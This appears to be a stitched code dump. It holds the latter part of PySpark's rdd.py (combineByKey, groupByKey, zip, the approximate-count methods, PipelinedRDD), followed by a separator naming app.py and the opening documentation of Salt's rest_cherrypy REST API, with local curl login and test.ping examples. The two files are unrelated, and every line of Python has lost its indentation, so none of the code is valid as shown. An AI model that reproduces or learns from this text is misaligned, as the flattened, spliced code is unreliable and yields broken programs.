pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(sock_info, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionaddedd:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionaddedd:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asyncronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
